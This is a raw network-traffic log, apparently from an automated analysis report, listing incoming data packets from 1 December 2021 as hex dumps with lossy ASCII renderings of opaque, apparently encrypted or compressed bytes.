2021-12-01 18:25:38 UTC	87	IN	Data Raw: 92 d6 34 21 91 8a f6 03 38 67 54 de 42 8c ba 45 08 36 9c c1 8a fe ab 36 03 19 22 de b1 e5 91 64 9a de b3 e5 b5 c3 d7 03 7f a1 a0 20 2c e8 ed 47 7c e6 f3 01 53 5c 9b 94 06 c8 60 38 1f 42 c8 16 ea 8d cb 9a 7a 63 a0 0b 6e 2e 9d 20 4c e0 e2 ea 24 dd e4 13 d4 b1 70 aa 83 29 af f3 f7 e7 a3 e9 91 ac b2 1a 3c f0 1c ec 57 0b f8 7e 5b 1e c9 5a 33 e1 1f 62 c9 7a 1a 77 fc f3 93 5f 6b aa 1b 8e bb 6d 23 fc e0 8d c9 17 97 50 72 af 4e 74 42 1d d1 b1 de 69 01 2b 22 ec 2d 3a fe 3a 9d 9f a6 bc db 5a a6 3a 22 8b 91 a9 84 99 35 3c 99 f0 4a 2e c8 22 9b 72 8b c6 f5 ce 3e de 4c a5 ad 48 13 49 af b7 9f 93 a9 f0 db 76 95 bb 97 e5 4c c8 23 b5 58 bd b2 ca bc 94 1d 86 28 7a 95 d4 8c 61 a8 8c 39 11 93 c5 3e f3 d5 d1 d7 88 76 1f 46 41 4a 56 77 b5 97 91 c1 3b a3 d6 33 a3 6e 16 af 3a cf Data Ascii: 4!8gTBE66"d ,G\|S\`8Bzcn. L$p)<W~[Z3bzw_km#PrNtBi+"-::Z:"5<J."r>LHIvL#X(za9>vFAJVw;3n:
2021-12-01 18:25:38 UTC	88	IN	Data Raw: 6a 76 f6 9a 39 c4 14 16 d5 7d 0b 4f 22 1f bf c9 f1 a1 df c7 80 ce 14 cf 8c bc 8f 88 32 38 95 6d c2 5d ed 66 e1 ba 16 7a 84 6c 37 15 24 99 2c 01 42 76 04 f8 49 e4 ca 15 5d 95 41 2a 9a 4e 94 93 c7 1c d0 8b cb bb 06 73 55 79 c1 54 4a 6f 0c 51 a4 41 48 d3 8e 92 52 9e c5 ca dc aa 5b 3c 0e bb 14 57 45 78 47 18 7b 37 02 23 26 7e 4d d3 a8 61 a1 bb 36 6b 17 07 a6 ee f0 f5 19 ae bf d2 c1 ea 61 2c 1e a8 18 fc 9d 2f 85 16 3e 4d 70 17 b6 b6 0c 52 1a e0 81 8a 93 46 86 c9 81 70 e5 40 23 db 91 13 e5 49 5c 1a fb 7d 61 53 17 4a e9 66 d0 41 05 06 d9 41 f0 3d 75 24 0e 7e 56 80 b7 e5 84 21 92 df fb f5 fc 3d a0 b5 e3 30 00 12 48 a5 58 e9 59 01 ab 9d 13 36 90 6a df 7c 8b 5b a1 d9 4a 44 70 56 b2 8d be 80 8f cb 47 5b b3 c2 d0 2b 05 82 01 e7 83 40 f9 27 ad b3 17 82 08 8b 20 67 37 Data Ascii: jv9}O"28m]fzl7$,BvI]A*NsUyTJoQAHR[<WExG{7#&~Ma6ka,/>MpRFp@#I\}aSJfAA=u$~V!=0HXY6j\|[JDpVG[+@' g7
2021-12-01 18:25:38 UTC	90	IN	Data Raw: 6f 60 1c 9c 25 2d 3c d0 6f fe 15 91 ab 09 45 6d 18 6f 0b e0 69 f4 2e d1 d5 21 e9 39 0b e1 e9 84 f9 cf 22 6f 59 6c 2b 4b 5a a3 3f e4 1f 32 aa aa 0d bf ed c9 97 a8 b4 18 d9 a8 b0 54 49 ca a2 dd 6e c2 20 ed 24 70 da 85 bc f3 b8 e0 1c 25 ed f6 e0 14 15 7f 99 ff 77 54 4d 37 57 33 f1 50 aa 0e 7b 02 31 c1 60 d7 4d c2 f6 66 8b d8 16 16 e2 63 a5 ae 78 67 48 e5 1e f5 37 fa 93 0b 69 aa 10 62 6d 3e 38 5d 03 a9 90 eb cb 57 0c 3b 62 2c 3a cf f0 9f 09 52 0f c7 e8 b6 93 bf 56 73 b5 68 5b 16 ce 02 71 b5 a6 f3 0e 46 cd 31 70 10 ba 23 8e c9 5f 3f d8 82 7d c1 2c b8 af 9c fd a0 d0 ff fe c3 d5 b9 61 5e 0a e6 7b 3f a6 54 25 32 93 bc 0f 12 f2 f7 72 c2 77 26 ae 28 11 fd 13 47 84 7d 82 c4 d5 a8 e0 57 5a 54 63 5a 05 6f f0 99 5e db c1 46 a5 b7 4f f3 1b 8b aa de c9 23 db 51 e3 bc 19 Data Ascii: o`%-<oEmoi.!9"oYl+KZ?2TIn $p%wTM7W3P{1`MfcxgH7ibm>8]W;b,:RVsh[qF1p#_?},a^{?T%2rw&(G}WZTcZo^FO#Q
2021-12-01 18:25:38 UTC	91	IN	Data Raw: 7d df 66 4d 34 04 2e 96 f1 dc 45 eb 07 ba 6d 63 6a 3a 37 3b 7f 02 12 39 f3 40 0c 1b 44 c9 e8 ef 06 d2 f8 18 71 aa 51 40 51 39 e0 14 2b f6 d0 c2 03 62 c4 80 fe b2 95 8f e8 8f ea 28 22 6e ef 69 cd 29 b9 79 4a 79 71 90 45 cb 7b 69 ec 1a 70 00 3e 8f 09 64 bb 9d d3 16 99 e9 dd 21 aa d9 41 f0 48 2c db 7a 5a 2e 0d 3b c1 08 21 92 df 04 81 d8 69 5f c1 c7 60 e8 c0 87 5a a7 d0 05 25 e3 e9 28 bb 14 4e 77 7c 8b 5b 28 85 6e 6c 20 db fe a9 9a 68 95 2b b9 a4 e2 4f 94 0f 29 d2 8c a3 a7 68 a9 aa e1 97 2f 6a b7 42 df 98 bc 6e 33 37 24 dd 9b b9 5a c3 99 ab a0 3d f0 a4 75 a9 b5 ee cd 37 63 43 30 8c ea 67 1a 6e 8b 9a 85 98 60 4b a3 c0 2c 29 cb f0 21 75 31 fe 87 33 d0 31 21 22 20 a0 25 34 52 4a 08 d4 b6 6e 38 7a 3f 3f cd 80 30 b7 04 14 fd 46 1d ad d7 59 14 2f b3 a0 32 4f f4 97 Data Ascii: }fM4.Emcj:7;9@DqQ@Q9+b("ni)yJyqE{ip>d!AH,zZ.;!i_`Z%(Nw\|[(nl h+O)h/jBn37$Z=u7cC0gn`K,)!u131!" %4RJn8z??0FY/2O
2021-12-01 18:25:38 UTC	92	IN	Data Raw: ca 6b c9 18 37 fe 8a dc cd ff 0e 7a 02 cf 57 48 62 48 b2 27 fc 1b b4 8a 83 ad 30 0d a9 72 8f 52 b4 65 bc c3 2a 6d 43 42 cf 41 c2 42 48 5d 14 c2 59 03 26 4f 46 4a 77 b6 12 8a d8 84 23 dc f4 26 5d 9f ca de 33 de 3e b5 3d 6e 5d 7d 73 e8 ae f5 76 1f 91 02 21 d3 6e ba 60 0c fb 1f f8 d4 19 8f 81 06 cb eb d8 8d 66 9e 5d 73 8c ec a6 a1 50 8a b1 35 1d 82 44 ff 80 e6 e2 b6 85 40 86 93 6d af f0 61 00 7e 0c 2c 45 84 46 c4 cc a7 f1 6a c4 12 8c ca b2 12 7b a4 79 0b 1b 8f f0 2d 97 d0 15 3c f2 92 aa 4c 32 f0 78 1b f7 18 ff e1 ee 9b ef 39 ce c2 2a 5b ce 6b 7a 7f 17 3d 03 db 0e d3 07 37 c0 1d 00 b2 ba 53 bf 4c b0 75 0e e8 b9 e2 e2 ce 1b a7 2a 74 59 e0 f7 86 88 74 c8 cf e5 9b f9 6a c5 3d e7 83 77 9c 90 2c d2 37 fa aa a0 6d d9 a9 06 06 d8 8a 24 38 b7 ec 66 cd d3 a4 3d b9 9a Data Ascii: k7zWHbH'0rRemCBABH]Y&OFJw#&]3>=n]}sv!n`f]sP5D@ma~,EFj{y-<L2x9[kz=7SLu*tYtj=w,7m$8f=
2021-12-01 18:25:38 UTC	93	IN	Data Raw: ee d3 16 99 e9 88 72 ef 8b 72 c2 66 68 97 36 5a 2e 40 5e b2 7b 40 f5 ba 46 ee a0 28 5f 80 b4 13 8d b2 f3 5a a7 91 6b 05 82 9a 5b de 66 3a 1e 13 e5 7b 4b ea 00 08 49 af 97 c6 f4 48 f3 4a d0 c8 87 2b 94 0f 29 82 f9 d1 c2 2b c8 c6 8d 97 2f 6a b7 42 df 98 bc 2f 13 47 51 af fe 99 2c aa eb df d5 5c 9c 84 13 dc db 8d b9 5e 0c 2d 10 fb 8b 14 3a 0d ea f6 e9 fd 04 65 83 94 44 40 b8 d0 48 06 11 9f a7 55 b1 45 40 4e 00 c5 57 46 3d 38 24 f4 d7 00 5c 5a 56 51 a9 e9 53 d6 70 71 8e 66 7c 8d a4 3c 66 46 dc d5 41 6f 91 e5 6a 39 e4 d8 4c c1 ce 64 c4 a8 c1 d4 84 59 76 98 18 21 fd c6 74 1f a5 64 ce 51 cd 21 b4 2c 2a 00 5d 16 9d f7 f9 c3 fd 5f de 8f 00 1b 7b 46 34 6f 81 cd 1e 3c f6 a1 f6 8d 74 e6 ef c9 26 7d 0b b8 3a 7a 2a 79 6e 48 fc 32 c8 dd 3c dc 9c 92 90 db 3a b2 9c bf bd Data Ascii: rrfh6Z.@^{@F(_Zk[f:{KIHJ+)+/jB/GQ,\^-:eD@HUE@NWF=8$\ZVQSpqf\|<fFAoj9LdYv!tdQ!,]_{F4o<t&}:zynH2<:
2021-12-01 18:25:38 UTC	95	IN	Data Raw: 70 52 ba b8 0c a6 5f 48 53 cc 9d 38 79 ca 24 95 05 7e 9e 84 73 a2 c2 f0 a0 08 0f 89 b4 0f 4d 21 77 ac e6 14 b6 8a 6e c7 72 4c d6 93 50 a2 b0 71 8f 66 84 1a c4 80 a7 9f 1f 05 be a1 36 34 c2 4a 04 41 0b ba c0 32 a5 d6 a4 b3 90 b6 6e 1e 9c 6e 50 6d 1b 54 57 3b 69 a1 17 26 c3 bd e1 59 8a ab c6 5f 7f 92 72 bf 26 96 d7 ff 44 ad 6c 61 46 85 c9 a6 1b 66 3f c9 f1 ab 5e 62 49 84 94 79 a6 14 4e 72 86 27 3b 1d 47 a4 5c a7 f4 21 b6 08 51 12 19 25 2c b6 6d 80 29 a4 a8 07 f0 a5 15 6c be 21 b2 f4 56 7a d0 d6 d9 24 20 d5 50 99 89 28 5e aa 60 ad d5 9f 89 71 1c 12 da e4 9a 1e 11 8e 76 5c 9b 82 d0 26 be ea 25 a2 63 54 87 b0 7d 2a 24 ae 2a e6 09 00 b4 26 30 ff d5 08 0b 73 af 2f 9b a1 a1 60 53 8c a8 ad 14 a6 64 7a 76 56 cd 14 9d 0e c2 29 60 83 c5 a6 14 7a 84 3f 67 fd c3 7c d2 Data Ascii: pR_HS8y$~sM!wnrLPqf64JA2nnPmTW;i&Y_r&DlaFf?^bIyNr';G\!Q%,m)l!Vz$ P(^`qv\&%cT}$&0s/`SdzvV)`z?g\|
2021-12-01 18:25:38 UTC	96	IN	Data Raw: 6e 6f 37 71 dd e8 b9 3f c3 eb ab 80 3d b4 a4 14 a9 c1 ee ac 37 3f 43 7c 8c 85 67 79 6e ea 9a e9 98 40 4b f0 c0 58 29 aa f0 55 75 54 fe 87 33 d0 31 21 22 20 a0 79 34 04 4a 61 d4 c0 6e 59 7a 53 3f a9 80 59 b7 58 14 a8 46 6e ad b2 59 66 2f 93 a0 76 4f 95 97 6c 56 f7 f8 79 af aa 10 c9 cd 87 bd 88 29 6f fd 19 44 e7 b2 49 6b 80 0b cf 71 c5 47 fd 58 2c 65 5d 77 a9 87 f4 aa ea 3e cb e6 6f 75 7b 46 34 37 85 95 05 64 c1 a1 9b c9 7e 84 fe ae 49 7d 57 f1 10 10 3d 1a 7b 21 f5 55 91 e9 52 80 93 eb b6 af 2c df ca 8d 93 47 d7 ab a7 84 fb 28 e9 c5 8f 0f f5 c6 ac 1d f9 9d 4a d6 f7 58 0e 63 d5 80 d1 af 05 64 21 e0 96 61 04 d5 b7 45 83 3a 60 27 da 2d 7e be bc 6e 91 15 03 9e 5e d8 5c 18 c7 0e f4 f4 e5 2e a2 d5 40 e9 b7 1f 8f e9 ea 72 ae 3a a7 0c 1f a0 7b a2 5a 71 cc 92 72 90 Data Ascii: no7q?=7?C\|gyn@KX)UuT31!" y4JanYzS?YXFnYf/vOlVy)oDIkqGX,e]w>ou{F47d~I}W={!UR,G(JXcd!aE:`'-~n^\.@r:{Zqr
2021-12-01 18:25:38 UTC	97	IN	Data Raw: 3c 05 ba 17 55 95 b3 94 53 fe 9c aa 6c 0c b2 24 ba 53 9d a3 9a 12 90 19 58 32 b3 a7 b6 76 71 4d 88 85 8a 17 77 2c 9d e7 18 f0 29 3b 52 f2 0f 5e 0a 0e b1 39 a6 f4 01 b6 5b 07 07 6c 28 58 84 1f 80 4c a4 a8 07 b9 a5 7b 30 ca 6c d7 9d 24 19 be a4 bc 4b 54 a6 70 f6 cc 4e 26 de 10 f1 b9 da e6 15 6e 75 bf 81 e8 42 11 db 26 2f e9 e7 bf 54 d8 ca 4c e6 0f 35 e2 c4 7d 4b 42 f2 43 a2 7b 65 d1 40 56 9e ba 7d 73 1f 81 5b fe fd d9 2c 36 e3 a8 ca 48 cf 02 14 1f 76 bf 50 f8 6f a4 5d 0f e2 bd a6 3a 7a e1 3f 1f fd a6 20 d2 fe c1 b2 54 75 80 c0 bd 17 27 95 78 79 a5 24 e4 c0 59 09 0c f9 cc bb 07 1f 51 38 a4 d9 a8 4b 7f 53 dc 41 44 2c 9b 82 50 df b7 99 3e 2e 19 20 65 bb 78 07 df 6d 10 6a 14 37 52 7f 6c 12 50 f3 40 0c 1b 44 95 e8 83 06 bd f8 7f 71 c3 51 2e 51 4a e0 3a 2b 9c d0 Data Ascii: <USl$SX2vqMw,);R^9[l(XL{0l$KTpN&nuB&/TL5}KBC{e@V}s[,6HvPo]:z? Tu'xy$YQ8KSAD,P>. exmj7RlP@DqQ.QJ:+
2021-12-01 18:25:38 UTC	98	IN	Data Raw: e0 d5 11 4d 56 1c b5 fc 6e 4a 53 6e 71 41 a3 d4 93 26 cd 73 70 56 ba 8c 0c f9 5f 0b 53 8e 9d 6e 79 89 24 f8 05 1a 9e 93 73 f4 c2 c0 a0 10 0f f5 b4 2f 4d 65 77 fd e6 79 b6 fe 6e 96 72 68 d6 c0 50 96 b0 2b 8f 24 84 71 c4 fa a7 f0 1f 31 be a7 36 3c c2 1e 04 72 0b ba c0 34 a5 d2 a4 ef 90 fb 6e 2b 9c 40 50 76 1b 58 57 3a 69 a1 17 33 c3 a6 e1 63 8a 90 c6 65 7f b1 72 b2 26 92 d7 ff 44 ad 6c 05 46 c3 c9 ed 1b 24 3f b5 f1 a0 5e 76 49 84 94 74 a6 27 4e 51 86 23 3b 22 47 95 5c b9 f4 6e b6 3d 51 0f 19 28 2c a7 6d 96 29 f8 a8 48 f0 d0 15 44 be 00 b2 f2 56 76 d0 cf d9 17 20 9f 50 c5 89 79 5e eb 60 b2 d5 9c 89 53 1c 45 da b5 9a 73 11 e8 76 1e 9b d6 d0 65 be ae 25 d5 63 77 87 fc 7d 73 24 b3 2a 92 09 55 b4 71 30 ae d5 49 0b 5d af 69 9b bc a1 1a 53 d5 a8 fd 14 f9 64 14 76 Data Ascii: MVnJSnqA&spV_Sny$s/MewynrhP+$q16<r4n+@PvXW:i3cer&DlF$?^vIt'NQ#;"G\n=Q(,m)HDVv Py^`SEsve%cw}s$*Uq0I]iSdv
2021-12-01 18:25:38 UTC	99	IN	Data Raw: 4f b6 0f 29 d2 ae a3 da 68 a9 aa e1 97 6b 3a f6 12 96 98 bc 6e 21 13 24 dd df a4 5a c3 99 8b a0 3d f0 94 75 a9 b5 c0 cd 37 11 43 45 8c 8e 67 6a 6e 8b 9a 85 98 3c 4b ea c0 6f 29 8a f0 62 75 7d fe d4 33 fe 31 44 22 58 a0 40 34 52 4a 54 d4 ce 6e 5b 7a 50 3f bd 80 49 b7 2a 14 98 46 65 ad b2 59 14 2f b3 a0 12 4f d6 97 18 56 96 f8 07 af ce 10 83 cd a6 bd bb 29 5b fd 3b 44 c7 b2 2f 6b be 0b 80 71 88 47 c7 58 6f 65 4c 77 c0 87 a4 aa b3 3e 9a e6 55 75 53 46 7b 37 90 95 6f 64 86 a1 b5 c9 58 84 b3 ae 60 7d 2b f1 7b 10 1b 1a 1a 21 92 55 a2 e9 7d 80 bf eb 93 af 1b df ce 8d 95 47 96 ab bf 84 d6 28 f2 c5 8d 0f c8 c6 8c 1d ca 9d 6e d6 f9 58 0d 63 92 80 ee af 14 64 40 e0 be 61 20 d5 c7 45 f3 3a 24 27 bb 2d 56 be 9e 6e a2 15 22 9e 5e d8 5b 18 c9 0e c4 f4 fd 2e 97 d5 4e e9 Data Ascii: O)hk:n!$Z=u7CEgjn<Ko)bu}31D"X@4RJTn[zP?I*FeY/OV)[;D/kqGXoeLw>UuSF{7odX`}+{!U}G(nXcd@a E:$'-Vn"^[.N
2021-12-01 18:25:38 UTC	100	IN	Data Raw: 05 58 db 94 46 e0 b7 e9 b3 cc b6 2d 42 e9 23 22 04 69 37 32 49 07 ce 63 55 80 d2 8e 3f e4 df b2 03 0d d7 1d db 4a f1 84 9a 21 f1 18 34 1a f6 9a c3 7e 14 4d e9 87 ef 37 03 2a f0 f1 18 d5 48 12 3e d2 48 5e 7e 35 c5 31 cb a7 01 d3 5b 23 66 6f 44 45 c2 0e e5 4c a4 a8 07 b9 a5 78 30 df 6c d5 9d 33 19 80 a4 b8 4b 54 a6 38 f6 89 4e 2d de 16 f1 b6 da e1 15 73 75 a9 81 ee 42 3f db 13 2f e3 e7 b5 54 be ca 56 e6 15 35 e4 c4 15 4b 4b f2 59 a2 7d 65 9a 40 55 9e ad 7d 6e 1f 8f 5b b6 fd ca 2c 53 e3 a8 ca 57 cf 01 14 04 76 b9 50 cd 6f b0 5d 0f e2 b5 a6 47 7a f2 3f 04 fd c3 20 81 fe a4 b2 7b 75 be c0 bb 17 32 95 7f 79 8c 24 e6 c0 4e 09 50 f9 8a bb 3d 1f 46 38 b3 d9 b8 4b 79 53 c7 41 7d 2c e8 82 61 df a6 99 25 2e 16 20 7a bb 71 07 ba 6d 63 6a 69 37 62 7f 51 12 6d f3 05 0c Data Ascii: XF-B#"i72IcU?J!4~M7*H>H^~51[#foDELx0l3KT8N-suB?/TV5KKY}e@U}n[,SWvPo]Gz? {u2y$NP=F8KySA},a%. zqmcji7bQm
2021-12-01 18:25:38 UTC	102	IN	Data Raw: cd f3 30 97 04 61 fd 35 1d c8 d7 2b 14 5c b3 a0 32 3b f4 f2 18 24 96 95 25 dc ee 62 ac bb e1 93 e9 4d 1a 91 75 28 93 b2 15 0e cc 73 a0 01 a2 2b 94 37 42 17 7d 12 ed f5 95 84 9e 5b aa 9e 6f 10 7b 46 34 37 d9 c1 46 25 ae f2 f6 82 11 e9 9a c9 26 0f 0b df 54 75 4f 62 1a 44 92 55 fe b9 3c f2 cf 84 e3 cc 5f ba af fe e1 34 f7 e3 e3 e5 9a 4b 9d ae ee 6a a9 b4 e0 33 96 f8 29 ae 96 3d 62 63 f5 f2 82 ca 71 03 40 85 e2 05 61 bc b7 31 83 14 60 42 da 55 22 db ff 6e fe 15 6e 9e 31 d8 38 18 a8 0e a8 f4 a1 40 d0 a1 21 8d d0 73 e0 85 84 5c f2 5e f2 60 6c cc 1e a2 28 3d 88 e0 71 f5 e5 9c bb 87 81 3d 9d 2a 6b ee 16 a1 c4 82 bb 4c fb 6e 2a 41 4c b6 c1 0f ce 55 c7 cc ae 29 79 8d 30 69 67 50 0d 14 a5 19 c9 18 37 c2 42 b1 9e 9a 7a 36 63 42 b5 de 75 23 f1 c4 a8 c4 56 e5 31 e2 e8 Data Ascii: 0a5+\2;$%bMu(s+7B}[o{F47F%&TuObDU<_4Kj3)=bcq@a1`BU"nn18@!s\^`l(=q=kLnALU)y0igP7Bz6cBu#V1
2021-12-01 18:25:38 UTC	103	IN	Data Raw: 29 c2 a8 73 f0 d2 15 51 be 1e b2 f8 56 45 d0 e9 d9 22 20 c5 50 84 89 21 5e ad 60 9e d5 bc 89 61 1c 29 da d6 9a 2b 11 b5 76 4b 9b 88 d0 23 be b9 25 c6 63 7b 87 90 7d 17 24 b1 2a d7 09 17 b4 32 30 fb d5 13 0b 6b af 0d 9b 98 a1 5e 53 90 a8 a3 14 a0 64 7a 76 2a cd 07 9d 06 c2 33 60 86 c5 c9 14 0d 84 4c 67 fd c3 20 d2 a2 c1 c2 08 07 cd af d2 70 5d e7 11 18 c9 49 88 b3 38 27 50 9b 8a da 6e 6b 23 38 c1 bf ce 24 10 21 a4 61 18 03 9b c4 20 ff c5 bb 51 5b 7f 53 0c de 14 65 ba 0c 63 09 3a 5c 3b 0e 02 32 39 87 40 63 1b 2f c9 8d ef 68 d2 8b 18 4c aa 7b 40 73 39 c0 14 0e f6 f5 c2 42 62 e4 80 97 b2 fb 8f c8 8f c2 28 00 6e ef 69 cd 29 83 79 39 79 05 90 24 cb 09 69 98 1a 70 00 3e 8f 2b 64 92 9d f3 16 fd e9 b2 21 8a d9 64 f0 6d 2c 9a 7a 5a 2e 37 3b 80 08 51 92 af 04 ed d8 Data Ascii: )sQVE" P!^`a)+vK#%c{}$20k^Sdzv3`Lg p]I8'Pnk#8$!a Q[Sec:\;29@c/hL{@s9Bb(ni)y9y$ip>+d!dm,zZ.7;Q
2021-12-01 18:25:38 UTC	104	IN	Data Raw: 10 22 1a 7f 21 bc 55 9b e9 44 80 aa eb e3 af 5f df af 8d e1 47 ab ab a2 84 ea 28 ed c5 aa 0f c8 c6 94 1d f7 9d 75 d6 da 58 0d 63 96 80 e3 af 1d 64 1c e0 a5 61 0e d5 d8 45 e4 3a 0c 27 bf 2d 7e be bc 6e 96 15 1c 9e 5e d8 55 18 cd 0e f4 f4 f4 2e a3 d5 44 e9 a2 1f c0 e9 c0 72 93 3a 86 0c 0d a0 1e a2 28 71 b0 92 77 90 e1 cc b9 e8 a6 58 98 5f 6d 8b 36 c5 fc f0 92 3f e7 6e 49 13 59 da e3 7b c1 21 e1 b8 b4 5a 42 e2 13 06 78 15 1a 66 88 6b a8 18 54 90 5d dd b8 ff 7e 7a 02 31 b9 89 7f 4d ad f6 9d b6 5d 8a 6d e2 8d f0 2e f3 4c 40 48 1a e0 0c 73 e5 2e 42 4a 41 d0 6c 4c c7 07 f7 55 68 57 9e 78 e4 92 b6 f2 c5 6e 0c 03 5c 72 19 ac 8e d6 3c 51 37 1d d1 f5 01 6e 73 7a 5c 13 cf 8f fc 64 e0 5e 1f 3d c9 ab 62 ad 3d 50 2b 92 f7 32 1b 98 09 e4 61 42 ed 96 11 ab a7 af 93 4c 22 Data Ascii: "!UD_G(uXcdaE:'-~n^U.Dr:(qwX_m6?nIY{!ZBxfkT]~z1M]m.L@Hs.BJAlLUhWxn\r<Q7nsz\d^=b=P+2aBL"
2021-12-01 18:25:38 UTC	106	IN	Data Raw: 76 30 51 9d 6f ec 29 05 9a b1 a6 14 7a 79 2e 67 fd 34 20 d2 fe ef c6 6d 0d b9 e4 b6 7e 5d 95 11 79 3d 36 88 c0 c1 45 51 f9 a4 cf 0b 67 57 1c ac b7 ce 4b 10 53 49 1e 19 2c 11 82 20 df eb ed 34 56 0b 04 75 df 14 07 ba 6d 63 1a 3b 37 ab 7c 02 12 17 9a 24 6d 6f 25 ed dd ef 06 d2 f8 88 02 ab 51 fc 64 39 e0 3a 59 92 b1 b6 62 62 c4 cc 57 b3 95 b7 e9 8f ea 06 50 0a 8e 1d ac 0d c3 03 30 1d 13 f7 45 cb 7b ed 46 1b 70 18 3f 8f 09 4a d2 f9 b2 62 f8 cd ef 21 aa d9 41 6c e3 2d db 6e 5a 2e 0d 15 a8 6c 40 e6 be 20 b2 d8 69 5f c1 77 cb e9 c0 17 59 a7 d0 2b 4c 87 88 5c da 30 7a 77 7c 8b 5b 68 2a 6f 6c 1c d4 fe a9 b4 01 f1 4a cd c5 c6 79 94 0f 29 d2 8c 63 a6 68 ad aa e1 97 01 29 e5 16 fb c0 ff 2f 33 37 24 dd 9f 79 5b c3 b5 ab a0 3d de e7 27 fd 91 b6 8e 62 63 43 30 8c da a7 Data Ascii: v0Qo)zy.g4 m~]y=6EQgWKSI, 4Vumc;7\|$mo%Qd9:YbbWP0E{Fp?Jb!Al-nZ.l@ i_wY+L\0zw\|[h*olJy)ch)/37$y[='bcC0
2021-12-01 18:25:38 UTC	107	IN	Data Raw: d0 f7 58 e8 84 a4 4a 3b f2 c8 d4 a1 1e 12 90 70 ec 0c 8e 91 91 40 71 e9 e2 22 41 5e 19 e3 ef c4 a0 be 66 3e 88 54 92 12 38 6e 38 7a 9d 3d 1e b9 db 50 95 e3 74 fa a3 14 7f 8e 7d 6a c9 ca 80 91 36 1d 7a fe 0e 54 ba 30 c1 21 ab 4c c2 f6 ed b6 24 1a ff e3 e8 e5 56 f3 a9 de d4 1b cf 05 3b e5 8e 52 65 41 09 68 6c c7 a8 e0 10 68 f7 8d 57 e4 51 c5 d2 c5 ee 1a 03 5c d2 37 81 e0 39 65 22 56 f3 1b 2b 6f 16 67 57 71 f2 a8 e3 93 93 cd 30 70 10 38 65 0d c9 1f 90 52 bf f3 f2 78 b8 74 66 04 2b 9e f7 73 c7 06 2d a1 28 ef 62 b5 6e e1 fa 76 cd e6 48 b6 ce a8 1e 73 2a d4 4f 51 d7 66 a1 8e 12 6e fa c5 cc b3 4d 1e 62 be c8 36 5a ac d6 05 05 0b db c0 46 a2 b7 e6 f0 e2 cf 1e 36 d8 46 33 76 62 47 23 49 4d ce 55 16 b1 ab 91 4b c5 af a3 6d 3e bb 15 b4 54 98 a3 f2 29 a1 1e 5b 30 9f Data Ascii: XJ;p@q"A^f>T8n8z=Pt}j6zT0!L$V;ReAhlhWQ\79e"V+ogWq0p8eRxtf+s-(bnvHs*OQfnMb6ZF6F3vbG#IMUKm>T)[0
2021-12-01 18:25:38 UTC	108	IN	Data Raw: 77 21 9a 9c 9d 6f bc 9f 4f 71 aa d9 40 12 4b 85 75 5f 93 96 ab 6f 07 85 80 4d b0 d2 e3 87 ed 8b 44 63 02 83 06 ae 29 06 78 0d 1c 05 d3 30 b9 09 0c 82 6e 34 69 4c ea 6a 10 d4 ef aa 41 99 e9 90 25 f9 bc 35 b3 3d 5e a9 1f 34 5a 49 52 b3 6d 42 e6 b0 76 f8 8f 69 5f 31 c6 27 8d b4 c1 33 cb b5 56 4c 99 8c 28 d9 15 08 05 19 ee 17 41 e7 1c 0d 52 a2 fe f8 9e 3b f0 5f fd c8 8e 0b fd 7d 4c b1 f8 cc d5 11 fe aa e1 66 2e 2d d2 36 99 f1 d0 0b 60 5e 5e b8 de c1 5a 87 9a e7 cf 5e 91 c8 34 c5 d9 81 ae 37 63 0b 33 c0 85 04 7b 02 cd e8 e0 fd 60 b2 a7 97 4d 40 bf b6 4e 07 62 97 e9 54 bc 54 6e 40 4a c5 46 40 52 e2 08 97 c4 0b 59 0e 5a 6f bf ef 53 d2 77 67 aa 46 1d 42 d3 0f 7d 5d c7 d5 53 23 a4 e5 77 22 f3 9b 51 af ee 76 a8 9e 84 c9 af 40 76 98 25 2b fa dc 61 0e be 0b a0 b2 a1 Data Ascii: w!oOq@Ku_oMDc)x0n4iLjA%5=^4ZIRmBvi_1'3VL(AR;_}Lf.-6`^^Z^47c3{`M@NbTTn@JF@RYZoSwgFB}]S#w"Qv@v%+a
2021-12-01 18:25:38 UTC	109	IN	Data Raw: 84 37 f3 67 42 3a 7f a8 65 48 91 6b 30 26 2d e8 1f 1f 90 28 f7 17 69 30 fb 23 a5 a2 cf bc a6 25 69 7a 0f 26 55 f5 85 b9 11 3e 56 30 d4 fb 02 58 36 2f 05 3a cc 8c f8 56 b5 30 70 7e ba 89 7e ac 3e 4b 36 e8 f4 33 1d d7 53 8c 7d 7c 9e 59 73 83 ab f1 d0 49 7b ae dc 23 28 26 04 ac 81 2d f7 ce 6e fb 73 6d b3 86 1d b2 c3 6e ee 75 e1 07 c4 f1 a6 b7 7a 16 f5 ad 4f 09 b6 0b 70 60 0b f5 c0 05 cd d6 d6 ff ff c1 0b 30 cb 23 50 5a 1b 74 25 2c 08 ba 72 11 a6 a1 8a 4b e5 af 91 03 7f 82 21 9e 74 c2 e5 b4 20 9d 00 34 46 98 cb 91 7e 73 6e 9c 94 9d 27 55 28 9c e1 7d e3 30 19 3e 86 29 39 2c 22 a2 13 bb 91 6f fd 3e 28 23 61 13 2c a2 6f b7 4c c3 e7 77 95 cb 5e 55 c7 29 ca dc 56 56 d2 f6 bc 2c 65 c8 25 9b c2 2b 27 9b 18 a6 d5 b7 8b 47 79 12 8b f4 ff 30 68 8d 17 43 ee 82 95 2c ff Data Ascii: 7gB:eHk0&-(i0#%iz&U>V0X6/:V0p~~>K63S}\|YsI{#(&-nsmnuzOp`0#PZt%,rK!t 4F~sn'U(}0>)9,"o>(#a,oLw^U)VV,e%+'Gy0hC,
2021-12-01 18:25:38 UTC	111	IN	Data Raw: 00 31 a6 90 60 bb 88 cb 0d e6 80 4c 0b 87 85 44 bb b3 4e 39 19 ff 17 47 e6 0f 00 67 a9 91 dc ea 29 f1 4f f4 c1 8f 2d f1 7d 5a d2 76 a3 e9 0d dd ff 92 f2 5d 2b d3 26 df 98 f2 2b 67 76 74 94 a8 8b 74 a7 f5 c7 a0 3d bf e8 30 e8 e0 ba fe 05 4d 27 5c e0 ea 67 c2 6e c8 e8 fc e8 14 18 d7 b2 45 47 ac a4 4e 37 58 90 e6 41 a9 70 21 22 fb a0 66 46 2b 3a 7c 81 d8 1e 4a 15 4b 5a ae f4 74 d6 70 75 fd 46 c4 ad 94 2b 6d 5f c7 f3 46 3d 9d f9 7f 02 f9 ba 4c c1 8f 62 d5 9a e1 bd aa 7b 43 ad 21 77 a1 9c 71 07 a0 0b b0 71 e5 22 e0 15 2d 01 08 1b 88 c1 fc c6 fb 70 cb 8b 0a 30 03 11 34 37 89 c6 07 34 e7 8f b2 85 5d 84 9a ae 26 7d 0b f1 54 10 4f 1a 1a 21 92 55 fe e9 3c 80 cf eb e3 af 5f df af 8d e1 47 f7 ab e3 84 9a 